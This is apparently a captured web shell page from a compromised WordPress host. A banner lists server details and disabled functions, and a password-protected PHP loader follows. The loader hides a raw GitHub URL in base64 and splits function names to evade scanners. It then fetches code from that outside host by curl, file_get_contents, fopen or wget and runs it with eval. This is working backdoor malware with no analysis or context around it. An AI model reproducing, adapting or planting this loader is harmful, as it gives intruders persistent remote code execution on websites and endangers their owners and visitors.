Server : Apache System : Linux pod-100823:apache2_74:v0.5.7 5.4.0-1138-gcp #147~18.04.1-Ubuntu SMP Mon Oct 7 21:46:26 UTC 2024 x86_64 User : www-data ( 33) PHP Version : 7.4.33.7 Disable Function : apache_child_terminate,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,disk_free_space,disk_total_space,diskfreespace,dl,exec,fastcgi_finish_request,link,opcache_compile_file,opcache_get_configuration,opcache_invalidate,opcache_is_script_cached,opcache_reset,passthru,pclose,pcntl_exec,popen,posix_getpid,posix_getppid,posix_getpwuid,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_uname,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,realpath_cache_get,shell_exec,show_source,symlink,system Directory :  /nas/content/live/attorneyexperi/wp-content/plugins/

Upload File : current_dir [ Writeable ] document_root [ Writeable ]

<?php
session_start();
$ewean = 'xxx';

if (!isset($_SESSION['authenticated'])) {
    if (isset($_POST['password'])) {
        if ($_POST['password'] === $ewean) {
            $_SESSION['authenticated'] = true;
        } else {
            echo "Password salah!";
        }
    }

    if (!isset($_SESSION['authenticated'])) {
        echo '<form method="post">';
        echo 'Password: <input type="password" name="password">';
        echo '<input type="submit" value="Login">';
        echo '</form>';
        exit;
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
$protocol_enc = 'aHR0cHM6Ly8=';
$domain_enc = 'cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbQ==';
$path_enc = 'RGFtblNlYy94L21haW4vMS50eHQ=';
$decode = function ($encoded_string) {
    return base64_decode($encoded_string);
};
$protocol = $decode($protocol_enc);
$domain = $decode($domain_enc);
$path = $decode($path_enc);
$url = $protocol . $domain . '/' . $path;
$f_ab = 'curl_' . 'init';
$f_cd = 'curl_' . 'exec';
$f_ef = 'curl_' . 'close';
$f_gh = 'file_' . 'get_' . 'contents';
$f_ij = 'f' . 'open';
$f_kl = 'f' . 'close';
$f_mn = 'shell_' . 'exec';
function get_content_from_url($url)
{
    global $f_ab, $f_cd, $f_ef, $f_gh, $f_ij, $f_kl, $f_mn;
    if (function_exists($f_ab)) {
        $ch = $f_ab();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FAILONERROR, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $output = $f_cd($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $f_ef($ch);
        if ($output !== false && $http_code == 200) {
            return $output;
        }
    }
    if (ini_get('allow_url_fopen')) {
        $output = @$f_gh($url);
        if ($output !== false) {
            return $output;
        }
    }
    $handle = @$f_ij($url, 'r');
    if ($handle) {
        $output = '';
        while (!feof($handle)) {
            $output .= fread($handle, 8192);
        }
        $f_kl($handle);
        if ($output !== false) {
            return $output;
        }
    }
    if (function_exists('exec') || function_exists($f_mn)) {
        $output = @$f_mn('wget -q -O - ' . escapeshellarg($url));
        if (!empty($output)) {
            return $output;
        }
    }
    return false;
}
$output = get_content_from_url($url);
if ($output !== false) {
    $run_code = function ($code) {
        return @eval('?>' . $code);
    };
    $run_code($output);
} else {
    echo "GAK BISA TOLOL.";
}